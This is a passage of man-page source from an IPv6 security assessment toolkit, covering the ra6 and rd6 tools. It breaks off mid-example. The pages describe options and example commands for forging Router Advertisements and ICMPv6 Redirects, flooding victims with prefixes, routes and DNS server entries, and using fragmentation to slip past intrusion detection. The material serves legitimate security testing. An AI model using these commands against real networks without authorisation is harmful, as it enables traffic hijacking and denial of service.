.TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop\-by\-Hop Options headers may be specified by means of multiple "\-H" options. .TP \-\-curhop, \-c This option specifies the CurHop value that is included in Router Advertisement messages. This is the value that nodes should use for the "Hop Limit" field of the IPv6 packets they send. If this option is not specified, the CurHop value defaults to 255. .TP \-\-lifetime, \-t This option specifies the Router Lifetime value that is included in Router Advertisement messages. The Router Lifetime is the amount of time (in seconds) that the router can be used as a "default router". If this option is left unspecified, a Router Lifetime value of 9000 seconds is selected. .TP \-\-reachable, \-r This option specifies the Reachable Time value that is included in Router Advertisement messages. The Router Lifetime is the amount of time in milliseconds that a neighbor is considered "reachable" after a reachability confirmation. If this option is left unspecified, a Reachable Time of 0xffffffff ("infinity") is selected. .TP \-\-retrans, \-x This option specifies the Retrans Timer value that is included in Router Advertisement messages. The Retrans Timer specifies the amount of time in milliseconds between retransmitted Neighbor Solicitation messages (with ‘0’ meaning "unspecified by this router"). If this option is left unspecified, a Retrans Timer of 4000 milliseconds is selected. .TP \-\-managed, \-m This option causes the ra6 tool to set the ‘M’ (Managed) bit in the Router Advertisement messages that it sends. The ‘M’ bit indicates that network configuration is "managed" (e.g., DHCPv6 should be used instead). If left unspecified, the ‘M’ bit is not set. .TP \-\-other, \-o This option causes the ra6 tool to set the ‘O’ ("Other") bit in the Router Advertisement messages that it sends. The ‘O’ bit indicates that additional configuration information is available through other means (e.g., DHCPv6). If left unspecified, the ‘O’ bit is not set. .TP \-\-home\-agent, \-a This option causes the ra6 tool to set the ‘H’ ("Home Agent") bit in the Router Advertisement messages that it sends (the ‘H’ bit is specified in RFC 3775). If this option is left unspecified, the ‘H’ bit is not set. .TP \-\-nd\-proxy, \-q This option causes the ra6 tool to set the ‘P’ ("ND Proxy") bit in the Router Advertisement messages that it sends (the "P" bit is specified in RFC4389). If this option is left unspecified, the ‘P’ bit is not set. .TP \-\-preference, \-p This option specifies the Preference field of the Router Advertisement messages, with "1" meaning "High", "0" meaning "Normal", and "\-1" meaning "low" (the value "\-2" is forbidden). If left unspecified, a Preference value of "1" (High) is selected. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the Router Advertisement messages (this option is only valid for Ethernet interfaces). If left unspecified, the link\-layer Source Address is randomized. When operating in passive mode, the link\-layer Source Address is selected according to the IPv6 Destination Address of the incoming Router Solicitation messages. If the IPv6 Destination Address of the incoming Router Solicitation message is a multicast address (usually the "all-routers link-local multicast" address "ff02::02"), the link\-layer Source Address is set to the address specified by the "\-S" option (or to a random address if the "\-S" option was left unspecified). If the IPv6 Destination Address of the incoming Router Solicitation is not a multicast address (i.e., it is a unicast address), the link\-layer Source Address is set to the Ethernet Destination Address of the incoming Router Solicitation message. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option is meant to specify the link\-layer Destination Address of the Router Advertisement messages (this option is only valid for Ethernet interfaces). If left unspecified, it is set to "33:33:00:00:00:01" (the Ethernet multicast address corresponding to the IPv6 "all-nodes link-local multicast" address). When operating in passive mode, the link\-layer Destination Address is set depending to the IPv6 Source Address of the incoming Router Solicitation message. If the IPv6 Source Address of the incoming Router Solicitation message is the unspecified address (::), the link\-layer destination address is set to "33:33:00:00:00:01" (the Ethernet multicast address corresponding to the IPv6 "all-nodes link-local multicast" address). Otherwise, the link\-layer Destination Address is set to the same value as the link\-layer Source Address of the incoming Router Solicitation message. .TP \-\-source\-lla\-opt, \-E This option specifies the contents of a source link\-layer address option to be included in the Router Advertisement messages. If a single option is specified, it is included in all the outgoing Router Advertisement messages. If more than one source link\-layer address is specified, they are included only in the first packet of a set of Router Advertisements (if more than one Router Advertisement needs to be sent in order to convey all the specified information). .TP \-\-add\-slla\-opt, \-e This option instructs the ra6 tool to include a source link\-layer address option in the Router Advertisement messages. The link\-layer address included in the option is the same as the Ethernet Source Address used for the outgoing Router Advertisement message. The difference between this option and the "\-E" option is that the latter does not specify the actual value of the option, but just instructs the tool include the option (the actual value of the option is selected according to the Ethernet Source address used in the outgoing packet). .TP \-\-prefix\-opt, \-P This option specifies the contents of a Prefix Information option to be included in Router advertisement messages, with the following format: "\-P prefix/length#flags#valid#preferred". Where "prefix/length" is a mandatory field that indicates an IPv6 prefix (e.g., "2001::/16"). "flags" is an optional argument that indicates which flags should be set for this prefix (‘L’ for the "on-link" flag, ‘A’ for the "autonomous address-configuration" flag, ‘R’ for "Router Address", and ‘-‘ for indicating that no flags should be set for this prefix) \-\- if this field is left unspecified, the "L" and "A" flags are set for in the specified Prefix Information option. "valid" is an optional field that indicates the "Valid Lifetime" for this prefix (the length of time in seconds during which this information can be used for on-link determination. If left unspecified, a value of 0xffffffff (infinity) is used. "preferred" is an optional argument that specifies the "Preferred Lifetime" value for this prefix (the length of time in seconds that addresses generated from this prefix via stateless address auto-configuration remain preferred). If left unspecified, a value of 0xffffffff (infinity) is used. .TP \-\-route\-opt, \-R This option specifies the contents of a Route Information option to be included in Router advertisement messages, with the following format: "\-R prefix/length#preference#lifetime". Where "prefix/length" is a mandatory field that indicates an IPv6 prefix (e.g., "2001::/16"). "preference" is an optional argument that indicates the preference of this prefix (with ‘1’ meaning "high", ‘0’ meaning "normal", ‘\-1’ meaning "low", and ‘\-2’ being an invalid value). If this field is left unspecified, a value of ‘1’ (i.e., "high") is selected. "lifetime" is an optional parameter that specifies the "Route Lifetime" for the specified route (the period of time during which this information can be used for route determination). If left unspecified, a value of 0xffffffff (infinity) is selected. .TP \-\-mtu\-opt, \-M This option is meant to specify the value of a MTU option that should be included in Router Advertisements. Multiple MTU options can be specified. .TP \-\-rdnss\-opt, \-N This option allows the advertisement of a number of recursive DNS servers by means of the RDNSS option. A "Lifetime" parameter (32 bits) indicates the amount of time (in seconds) that the specified DNS server(s) may be used for name resolution. Multiple IPv6 addresses can be specified in the same RDNSS option in the form "\-\-dns\-opt lifetime#ipv6address1#ipv6address2". Also, more than one RDNSS option may be specified. .TP \-\-flood\-prefixes, \-f This option instructs the ra6 tool to flood the victim host with Prefix information options. The number of Prefix Information options to be sent is specified as "\-f number". When this option is specified, a "\-P" option must be specified (with the usual syntax "\-P prefix/length#flags#valid#preferred"), such that it instructs ra6 about how to generate the Prefix Information options. The "prefix/length" specifies the length of the prefixes that will be included in each Prefix Information option. While the prefix length will be constant for all options, the actual prefix will be randomized. The rest of the parameters will be shared by all the prefixes, and have the same "defaults" as indicated in the description of the "\-P" option. .TP \-\-flood\-sources, \-F This option instructs the tool to send Router Advertisement messages from multiple addresses. The number of different sources is specified as "\-F number". The Source Address of each Router Advertisement is randomly selected from the prefix specified by the "\-s" option. If the "\-F" option is specified but the "\-s" option is left unspecified, the Source Address of the packets is randomly selected from the prefix fe80::/64 (link-local unicast). It should be noted that hosts are required to discard Router Advertisement messages that do not have a link-local unicast address as the Source Address. .TP \-\-flood\-routes, \-w This option instructs the ra6 tool to flood the target with Route Information options. The number of Route Information options to be sent is specified as "\-R number". When this option is specified, a "\-R" option should be specified (with the usual syntax "\-R prefix/length#preference#lifetime") such that ra6 is instructed about how to generate the Route Information options. The "prefix/length" species the length of the prefixes that will be included in each Route Information option. While the prefix length will be constant for all options, the actual prefix will be randomized. The rest of the parameters are shared by all the the options, and have the same "default values" as indicated in the description of the "\-R" option. .TP \-\-flood\-dns, \-W This option instructs the ra6 tool to flood the target with random IPv6 addresses (supposed to correspond to recursive DNS servers), by means of the Recursive DNS Server (RDNSS) option. The number of IPv6 addresses that are to be sent to the target is specified as "\-k number". As there is a limit in the number of IPv6 addresses that can be included in a RDNSS option, it may be necessary for the tool to split those addresses into several RDNSS options. It is possible to instruct the ra6 about the maximum number of IPv6 addresses that each RDNSS option should contain, by means of a second (and optional) parameter to the "\-k" option. Namely, the tool can be instructed to send a total number of addresses ("totaladdresses") with up to some specific number ("addrsperoption") of addresses per RDNSS option in the form "\-k totaladresses#addrsperoption". This might be helpful if it is believed that the target implementation enforces a limit on the number of addresses it honors on a "per RNDSS option" basis, but no limit on the aggregate number of addresses. In such a case, an implementation might e.g. survive the attack "\-k 5000", but still be vulnerable to the attack "\-k 5000#3"). The "Lifetime" value for these addresses can be specified by issuing a "\-N" option with the desired "Lifetime" (this is analogous to how the "\-\-flood\-routes" operates together with the "\-R" option, and how the "\-\-flood\-prefixes" operates together with the "\-P" option). .TP \-\-block\-src, \-j This option sets a block filter for the incoming Router Solicitation messages based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-j prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP \-\-block\-dst, \-k This option sets a block filter for the incoming Router Solicitation messages, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-k prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP \-\-block\-link\-src, \-J This option sets a block filter for the incoming Router Solicitation messages, based on their link\-layer Source Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP \-\-block\-link\-dst, \-K This option sets a block filter for the incoming Router Solicitation messages, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP \-\-accept\-src, \-b This option sets an accept filter for the incoming Router Solicitation messages, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-b prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP \-\-accept\-dst, \-g This option sets a accept filter for the incoming Router Solicitation messages, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-g prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP \-\-accept\-link\-src, \-B This option sets an accept filter for the incoming Router Solicitation messages, based on their link\-layer Source Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP \-\-accept\-link\-dst, \-K This option sets an accept filter for the incoming Router Solicitation messages, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP \-\-loop, \-l This option instructs the ra6 tool to send periodic Router Advertisements to the destination node. The amount of time to pause between sending Router Advertisements can be specified by means of the "\-z" option, and defaults to 1 second. Note that this option cannot be set in conjunction with the "\-L" ("\-\-listen") option. .TP \-\-sleep, \-z This option specifies the amount of time to pause between sending Router Advertisements. If left unspecified, it defaults to 1 second. .TP \-\-listen, \-L This option specifies that the tool should enter the "passive" mode (possibly after operating in active mode, if the ‘\-d’ or ‘\-D’ options were specified). .TP \-\-verbose, \-v This option instructs the ra6 tool to be verbose. .TP \-\-help, \-h Print help information for the ra6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B ra6 tool. \fBExample #1\fR # ra6 \-i eth0 \-P 2001::/64#LA \-P 2002::/64#A \-e \-L Listen ("\-L") for incoming Router Solicitations on interface eth0 ("\-i eth0"), and advertise the prefix 2001::/64 for both on-link determination and auto-configuration ("\-P 2001::/64#LA") and the prefix 2002::/64 only for auto-configuration ("\-P 2002::/64#A"). Include a source link\-layer address option ("\-e") in the Router Advertisements. \fBExample #2\fR # ra6 \-i eth0 \-d fe80::1 \-D 01:02:03:04:05:06 \-c 5 \-\-lifetime 100 \-o \-e \-M 1400 Use the network interface "eth0" to send a Router Advertisement using a random link-local IPv6 Source Address and a random Ethernet Source Address, to the IPv6 Destination address fe80::1 and the Ethernet Destination Address 01:02:03:04:05:06. The Router Advertisement includes a "Router Lifetime" of 100, and advertises a CurHop value of 5 (i.e., a recommended "Hop Limit" of "5"). The ‘O’ bit is set (thus indicating that other configuration information is available via DHCP). The Router Advertisement includes a source link\-layer address option (containing the same address as the Ethernet Source Address of the packet) and an MTU option with a value of 1400. \fBExample #3\fR # ra6 \-i eth0 \-\-flood\-sources 10 \-\-flood\-routes 50 \-\-flood\-prefixes 40 \-R ::/64#1 \-P ::/48#LA \-L \-e Listen for incoming Router Solicitation messages on the interface "eth0", and respond with Router Advertisements from 10 different link-local unicast IPv6 Source Addresses (randomized) and 10 different (randomized) Ethernet Source Addresses. Each Router Advertisement includes 50 Route Information options, each of them with a randomized /64 prefix and a preference of 1 ("high"). The Router Advertisements also contain 40 Prefix Information options, each with a randomized /48 prefix and the ‘A’ (auto-configuration) and ‘L’ (on-link determination) bits set. In addition, each Router Advertisement includes a source link\-layer address option, containing the same (randomized) address as that used for the Ethernet Source Address field. \fBExample #4\fR # ra6 \-i eth0 \-N 1000#fe80::1#2001:db8::1 \-L Listen for incoming Router Solicitation messages, and respond with a Router Advertisement that contains one RDNSS option with two IPv6 addresses (fe80::1 and 2001:db8::1), with a Lifetime of "1000". All Router Solicitation messages sent to multicast addresses will be responded using the same (randomized) IPv6 Source Address and the same (randomized) Ethernet Source Address. Router Solicitation messages destined to unicast addresses will be responded with Router Advertisements using the IPv6 Destination Address and the Ethernet Destination Address of the incoming Router Solicitation message for the IPv6 Source Address and the Ethernet Source Address of the Router Advertisement, respectively. \fBExample #5\fR # ra6 \-i eth0 \-s fe80::1234 \-S 00:01:02:03:04:05 \-d fe80::1 \-N 900 \-\-flood\-dns 1000#10 \-L Flood the target (fe80::1) with 1000 random IPv6 addresses of Recursive DNS Servers, with a maximum of 10 addresses per RDNSS option. Each RDNSS option has a "Lifetime" of 900. Packets are sent with an IPv6 Source Address of "fe80::1234" and an Ethernet Source Address of "00:01:02:03:04:05". Once the target has been attacked, listen for incoming Router Solicitation messages and respond with the same "flood" packets (the Ethernet Source Address and the IPv6 Source Address will change if the Router Solicitation messages have been sent to a unicast address, though). .SH SEE ALSO "Security/Robustness Assessment of IPv6 Neighbor Discovery Implementations" (available at: ) for a discussion of Neighbor Discovery vulnerabilities, and additional examples of how to use the na6 tool to exploit them. .SH AUTHOR The .B ra6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/manuals/rd6.1000066400000000000000000000514441254360455000166370ustar00rootroot00000000000000.TH RD6 1 .SH NAME rd6 \- A security assessment tool for attack vectors based on ICMPv6 Redirect messages .SH SYNOPSIS .B rd6 .RB [\| \-i .IR INTERFACE\| ] [\-s SRC_ADDR[/LEN]] [\-d DST_ADDR] [\-S LINK_SRC_ADDR] [\-D LINK-DST-ADDR] [\-A HOP_LIMIT] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-r RD_DESTADDR/LEN] [\-t RD_TARGETADDR/LEN] [\-p PAYLOAD_TYPE] [\-P PAYLOAD_SIZE] [\-n] [\-c HOP_LIMIT] [\-x SRC_ADDR] [\-a SRC_PORT] [\-o DST_PORT] [\-X TCP_FLAGS] [\-q TCP_SEQ] [\-Q TCP_ACK] [\-V TCP_URP] [\-w TCP_WIN] [\-M] [\-O] [\-N] [\-E LINK_ADDR] [\-e] [\-j PREFIX[/LEN]] [\-k PREFIX[/LEN]] [\-J LINK_ADDR] [\-K LINK_ADDR] [\-b PREFIX[/LEN]] [\-g PREFIX[/LEN]] [\-B LINK_ADDR] [\-G LINK_ADDR] [\-f] [\-R N_DESTS] [\-T N_TARGETS] [\-F N_SOURCES] [\-L | \-l] [\-z] [\-v] [\-h] .SH DESCRIPTION .B rd6 allows the assessment of IPv6 implementations with respect to a variety of attack vectors based on ICMPv6 Redirect messages. This tool is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 protocols. This tool has two modes of operation: active and passive. In active mode, the tool attacks a specific target, while in passive mode the tool listens to traffic on the local network, and launches an attack in response to such traffic. Active mode is employed if an IPv6 Destination Address, a Redirect Destination Address, and a Redirect Target Address are specified. Passive mode is employed if the "\-L" option (or its long counterpart "\-\-listen") is set. If both an attack target and the "\-L" option are specified, the attack is launched against the specified target, and then the tool enters passive mode to respond incoming packets with ICMPv6 Redirect messages. The tool supports filtering of incoming packets based on the Ethernet Source Address, the Ethernet Destination Address, the IPv6 Source Address, and the IPv6 Destination Address. There are two types of filters: "block filters" and "accept filters". If any "block filter" is specified, and the incoming packet matches any of those filters, the message is discarded (and thus no Redirect messages are sent in response). If any "accept filter" is specified, incoming packets must match the specified filters in order for the tool to respond with Redirect messages. .SH OPTIONS .B rd6 takes it parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). Depending on the amount of information (i.e., options) to be conveyed into the ICMPv6 Redirect messages, it may be necessary for the rd6 tool to split that information into more than one Redirect message. Also, if the tool is instructed to e.g. flood the victim with Redirect messages from different sources ("\-\-flood\-sources" option), multiple packets may need to be generated. rd6 supports IPv6 fragmentation, which might be of use to circumvent layer-2 filtering and/or Network Intrusion Detection Systems (NIDS). However, IPv6 fragmentation is not enabled by default, and must be explicitly enabled with the "\-y" option. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link-local address, or the "listening" ("\-L") mode is selected, the interface must be explicitly specified. The interface may also be specified along with a destination address, with the "\-d" option. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 source address (or IPv6 prefix) to be used for the Source Address of the attack packets. This address typically corresponds to the IPv6 link-local address of the default router. If the "\-F" ("\-\-flood\-sources") option is specified, this option includes an IPv6 prefix, from which random addresses are selected. See the description of the "\-F" option for further information on how the "\-s" option is processed in that specific case. Note: Instead of specifying the "Source Address" with this option, the "\-\-learn\-router" option could be set, such that the tool automatically learns the IPv6 link-local address of the default router, and uses this address for the "Source Address" of the Redirect messages. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the victim. It can be left unspecified only if the "\-L" option is selected (i.e., if the tool is to operate in "Passive" mode). When operating in passive mode ("\-L" option), the IPv6 Destination Address is selected according to the IPv6 Source Address of the incoming packet. .TP \-\-hop\-limit, \-A This option specifies the Hop Limit to be used for the Redirect messages. It defaults to 255. Note that IPv6 nodes are required to check that the Hop Limit of incoming Redirect messages is 255. Therefore, this option is only useful to assess whether an IPv6 implementation fails to enforce the aforementioned check. .TP .BI \-y\ SIZE ,\ \-\-frag\-hdr\ SIZE This option specifies that the resulting packet must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the resulting packet. The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. This option is only valid if the "\-y" option is specified (as the concept of "unfragmentable part" only makes sense when fragmentation is employed). .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop\-by\-Hop Options headers may be specified by means of multiple "\-H" options. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the Redirect messages (this option is only valid for Ethernet interfaces). If left unspecified, the link\-layer Source Address is randomized. However, if this option is left unspecified, but the "\-\-learn\-router" option is set, the link\-layer Source Address is set to that of the default router for the local network. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link\-layer Destination Address of the Redirect messages (this option is only valid for Ethernet interfaces). If left unspecified, it is set to the "all-nodes link-local multicast" address (ff02::1). When operating in passive mode, the link\-layer Destination Address is set according to the link\-layer Source Address of the incoming packet. .TP \-\-redir\-target, \-t This option specifies the Target Address of the Redirect messages. If the "\-T" ("\-\-flood\-targets") option is specified, this option specifies an IPv6 prefix in the form "\-t prefix/prefixlen". See the description of the "\-T" option for further information on how the "\-t" option is processed in that specific case. This option can be left unspecified only if the "\-\-make\-onlink" option is selected, in which case the Redirect Target Address is set to the same value as the Redirect Destination address. .TP \-\-redir\-dest, \-r This option specifies the Redirect Destination Address. If the "\-R" ("\-\-flood\-dests") option is specified, this option specifies an IPv6 prefix in the form "\-r prefix/prefixlen". See the description of the "\-R" option for further information on how the "\-t" option is processed in that specific case. .TP \-\-payload\-type, \-p This option specifies the payload type to be included in the Redirect Payload. Currently supported payloads are "TCP", "UDP", and "ICMP6". The payload-type defaults to "TCP". .TP \-\-payload\-size, \-P Size of the payload to be included in the Redirect message (with the payload type being specified by the "\-p" option). By default, as many bytes as possible are included, without exceeding the minimum IPv6 MTU (1280 bytes). .TP \-\-no\-payload, \-n This option specifies that no payload (i-e-, no Redirected Header option) should be included in the Redirect message. .TP \-\-ipv6\-hlim, \-c This option specifies the Hop Limit of the IPv6 packet included in the payload of the Redirect message. It defaults to 255. .TP \-\-peer\-addr, \-x This option specifies the IPv6 Source Address of the Redirect payload. If left unspecified, the IPv6 Source Address of the Redirect payload is set to the same value as the IPv6 Destination Address of the packet. This option is only employed for packets sent in "active" mode. Note: this option might be useful to check whether an implementation validates the contents of the Redirect message. .TP \-\-redir\-port, \-o This option specifies the Destination Port of the TCP or UDP packet contained in the Redirect payload. Note: This option is meaningful only if "TCP" or "UDP" have been specified with the "\-p" option. .TP \-\-peer\-port, \-a This option specifies the Source Port of the TCP or UDP packet contained in the Redirect payload. Note: This option is meaningful only if "TCP" or "UDP" have been specified with the "\-p" option. .TP \-\-tcp\-flags, \-X This option specifies the flags of the TCP header contained in the Redirect payload. The flags are specified as "F" (FIN), "S" (SYN), "R" (RST), "P" (PSH), "A" (ACK), "U" (URG), "X" (no flags). If left uspecified, only the "ACK" bit is set. Note: This option is meaningful only if "TCP" has been specified with the "\-p" option. .TP \-\-tcp\-seq, \-q This option specifies the Sequence Number of the TCP header contained in the Redirect payload. If left unspecified, the Sequence Number is randomized. Note: This option is meaningful only if "TCP" has been specified with the "\-p" option. .TP \-\-tcp\-ack, \-Q This option specifies the Acknowledgment Number of the TCP header contained in the Redirect payload. If left unspecified, the Acknowledgment Number is randomized. Note: This option is meaningful only if "TCP" has been specified with the "\-p" option. .TP \-\-tcp\-urg, \-V This option specifies the Urgent Pointer of the TCP header contained in the Redirect payload. If left unspecified, the Urgent Pointer is set to 0. Note: This option is meaningful only if "TCP" has been specified with the "\-p" option. .TP \-\-tcp\-win, \-w This option specifies the Window of the TCP header contained in the Redirect payload. If left unspecified, the Window is randomized. Note: This option is meaningful only if "TCP" has been specified with the "\-p" option. .TP \-\-resp\-mcast, \-M This option specifies that, when operating in "passive" mode, the tool should also respond to packets sent to multicast addresses. By default, the tool does not send Redirects in response to packets sent to multicast addresses. .TP \-\-make\-onlink, \-O This option instructs the tool to set the Redirect Target Address to the same value as the Redirect Destination Address, thus causing the specified address to be considered "on-link". .TP \-\-learn\-router, \-N This option instructs the tool to learn the link\-layer and the (link-local) IPv6 addresses of the local router by means of Router Solicitation and Router Advertisement messages. If the IPv6 Source Address or the link\-layer Source Address are left unspecified, the corresponding values learned with this option will be used. Note: This option is very useful to avoid having to manually enter the IPv6 and/or Ethernet addresses of the router. .TP \-\-target\-lla\-opt, \-E This option specifies the contents of a target link\-layer address option to be included in the Redirect messages. If a single option is specified, it is included in all the outgoing Redirect messages. If more than one target link\-layer address is specified (by means of multiple "\-E" options), and all the resulting options cannot be conveyed into a single Redirect message, multiple Redirect messages will be sent as needed. .TP \-\-add\-tlla\-opt, \-e This option instructs the rd6 tool to include a target link\-layer address option in the Redirect messages that it sends. When this option is employed, the link\-layer Source Address must be specified, and such value will be used for the target link\-layer address option. The difference between this option and the "\-E" option is that the "\-e" option does not specify the actual value of the option, but just instructs the tool to include a target link\-layer address option (the actual value of the option is selected as explained before). .TP .BI \-j\ SRC_ADDR ,\ \-\-block\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-j prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-k\ DST_ADDR ,\ \-\-block\-dst\ DST_ADDR This option sets a block filter for the incoming Neighbor Solicitation messages, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-k prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-J\ SRC_ADDR ,\ \-\-block\-link\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their link\-layer Source Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP .BI \-K\ DST_ADDR ,\ \-\-block\-link\-dst\ DST_ADDR This option sets a block filter for the incoming packets, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP .BI \-b\ SRC_ADDR ,\ \-\-accept\-src\ SRC_ADDR This option sets an accept filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-b prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-g\ DST_ADDR ,\ \-\-accept\-dst\ DST_ADDR This option sets a accept filter for the incoming packets, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-g prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-B\ SRC_ADDR ,\ \-\-accept\-link\-src\ SRC_ADDR This option sets an accept filter for the incoming Neighbor Solicitation messages, based on their link\-layer Source Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP .BI \-G\ DST_ADDR ,\ \-\-accept\-link\-dst\ DST_ADDR This option sets an accept filter for the incoming packets, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP \-\-sanity\-filters, \-w This option automatically adds an "accept filter" for the link\-layer Destination Address corresponding to the local router (either learned as a result of the "\-\-learn\-router" option, or specified by the "\-S" option), and a block filter for the IPv6 Source Address fe80::/16. Note: This option is desirable in virtually all scenarios, such that the tool does not respond to link-local traffic, etc. .TP \-\-flood\-dests, \-R This option instructs the rd6 tool to send multiple Redirect messages for different Redirect Destination Addresses. The number of different Redirect Destination Addresses is specified as "\-R number". The Redirect Destination Address of each packet is randomly selected from the prefix ::/0, unless a different prefix has been specified by means of the "\-r" option. .TP \-\-flood\-targets, \-T This option instructs the rd6 tool to send multiple Redirect messages for different Redirect Target Addresses. The number of different Target Addresses is specified as "\-T number". The Target Address of each packet is randomly selected from the prefix fe80::/64, unless a different prefix has been specified by means of the "\-t" option. .TP \-\-flood\-sources, \-F This option instructs the tool to send multiple Redirect messages with different Source Addresses. The number of different sources is specified as "\-F number". The Source Address of each Redirect message is randomly selected from the prefix specified by the "\-s" option. If the "\-F" option is specified but the "\-s" option is left unspecified, the Source Address of the packets is randomly selected from the prefix fe80::/64 (link-local unicast). It should be noted that hosts are required to discard Redirect messages whose IPv6 Source address does not match the (link-local) IPv6 address of the router used for the Redirect Destination Address. .TP \-\-loop, \-l This option instructs the rd6 tool to send periodic Redirect messages to the victim node. The amount of time to pause between sending Redirect messages can be specified by means of the "\-z" option, and defaults to 1 second. Note that this option cannot be set in conjunction with the "\-L" ("\-\-listen") option. .TP \-\-sleep, \-z This option specifies the amount of time to pause between sending Redirect messages (when the "\-\-loop" option is set). If left unspecified, it defaults to 1 second. .TP \-\-listen, \-L This instructs the rd6 tool to operate in passive mode (possibly after attacking a given node). Note that this option cannot be used in conjunction with the "\-l" ("\-\-loop") option. .TP \-\-verbose, \-v This option instructs the rd6 tool to be verbose. When the option is set twice, the tool is "very verbose", and the tool also informs which packets have been accepted or discarded as a result of applying the specified filters. .TP \-\-help, \-h Print help information for the rd6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B rd6 tool. \fBExample #1\fR # rd6 \-i eth0 \-\-learn\-router \-\-sanity\-filters \-L \-\-make\-onlink \-v The tool uses the network interface "eth0", and operates in passive mode ("\-L" option). The IPv6 and Ethernet address of the local router is automatically learned by means of RS/RA messages. Basic filters are employed to avoid responding to incorrect/unnecessary packets ("\-\-sanity\-filters"). Each Redirect message will contain the Redirect Target Address set to the same value as the Redirect Destination Address, thus causing the corresponding address to be considered "on-link" ("\-\-make\-onlink" option). The tool will print detailed information about the attack ("\-v" option). \fBExample #2\fR # rd6 \-i eth0 \-\-learn\-router \-d 2001:db8::1 \-r 2001:db8::/64 \-t fe80::bad \-R 100 \-l \-v Flood the victim host (specified with the "\-d" option) with batches of 100 Redirect messages ("\-R 100" option). Each Redirect message redirects a random address from the prefix "2001:db8::/64" to the address "fe80::bad". The IPv6 and link\-layer addresses of the current local router is dynamically learned by means of RS/RA messages ("\-\-learn\-router" option). The process is repeated every second ("\-l" 